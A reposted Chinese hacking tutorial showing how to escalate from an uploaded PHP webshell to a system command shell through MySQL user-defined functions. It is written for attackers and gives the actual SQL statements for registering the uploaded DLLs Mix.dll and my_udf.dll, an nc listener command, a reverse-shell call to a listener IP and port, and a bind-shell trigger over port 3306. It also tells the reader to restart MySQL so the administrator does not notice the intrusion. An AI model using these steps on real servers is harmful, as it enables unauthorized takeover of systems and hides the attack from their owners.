WEBSHELL提升权限又一招(Mysql漏洞) 's

admin 2017年4月3日00:31:25评论367 views字数 1115阅读3分43秒阅读模式
摘要

作者:hack520 来源:华夏黑客同盟S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,如图1

作者:hack520 来源:华夏黑客同盟

S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,如图1

WEBSHELL提升权限又一招(Mysql漏洞)  's
一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。如图2
WEBSHELL提升权限又一招(Mysql漏洞)  's
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3
WEBSHELL提升权限又一招(Mysql漏洞)  's
哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname ‘d://php//php//Mix.dll’; 来注册函数.
出现SQL语句成功执行!如图4
WEBSHELL提升权限又一招(Mysql漏洞)  's
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect(‘192.168.1.254′,’1234’); 来激活那个函数,如图5
WEBSHELL提升权限又一招(Mysql漏洞)  's
执行成功,然后看看我们的NC有反映没,如图6
WEBSHELL提升权限又一招(Mysql漏洞)  's
成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname ‘D://php//php/my_udf.dll’; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (”); 然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了如图7
WEBSHELL提升权限又一招(Mysql漏洞)  's
OK成功!测试结束咯

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月3日00:31:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WEBSHELL提升权限又一招(Mysql漏洞) 'shttps://cn-sec.com/archives/48203.html

发表评论

匿名网友 填写信息